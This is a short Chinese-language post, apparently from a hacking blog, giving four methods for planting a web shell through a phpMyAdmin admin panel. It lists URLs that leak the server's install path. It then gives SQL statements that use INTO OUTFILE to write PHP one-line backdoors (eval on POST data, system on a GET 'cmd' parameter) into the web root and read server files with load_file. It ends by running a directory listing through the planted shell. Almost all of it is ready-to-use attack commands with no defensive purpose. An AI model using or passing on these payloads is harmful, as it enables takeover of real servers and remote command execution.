phpmyadmin后台4种拿shell方法
phpMyAdmin暴路径办法:
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!!
方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES (‘<?php @eval($_POST[xiaoma])?>’); SELECT xiaomaFROM study INTO OUTFILE ‘E:/wamp/www/7.php’; —-以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php 一句话连接密码:xiaoma
方法二: Create TABLE xiaoma (xiaoma1 text NOT NULL); Insert INTO xiaoma (xiaoma1) VALUES(‘<?php eval($_POST[xiaoma])?>’); select xiaoma1 from xiaoma into outfile ‘E:/wamp/www/7.php’; Drop TABLE IF EXISTS xiaoma;
方法三:
读取文件内容: select load_file(‘E:/xamp/www/s.php’);
写一句话:select ‘<?php @eval($_POST[cmd])?>’INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
cmd执行权限:select ‘<?php echo \’<pre>\’;system($_GET[\'cmd\']); echo \’</pre>\’; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
方法四: select load_file(‘E:/xamp/www/xiaoma.php’);
select ‘<?php echo \’<pre>\’;system($_GET[\'cmd\']); echo \’</pre>\’; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’ 然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
标签分类:
下一篇:利用批处理取得system权限
